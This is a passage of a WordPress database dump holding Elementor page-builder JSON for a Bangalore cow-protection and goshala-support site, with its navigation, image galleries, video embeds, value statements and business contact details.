qb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9784,1646,'_elementor_page_assets','a:0:{}'),(9786,1647,'_elementor_edit_mode','builder'),(9787,1647,'_elementor_template_type','wp-page'),(9788,1647,'_elementor_version','3.7.8'),(9789,1647,'_wp_page_template','elementor_canvas'),(9790,1647,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9791,1647,'_elementor_page_assets','a:0:{}'),(9793,1648,'_elementor_edit_mode','builder'),(9794,1648,'_elementor_template_type','wp-page'),(9795,1648,'_elementor_version','3.7.8'),(9796,1648,'_wp_page_template','elementor_canvas'),(9797,1648,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About 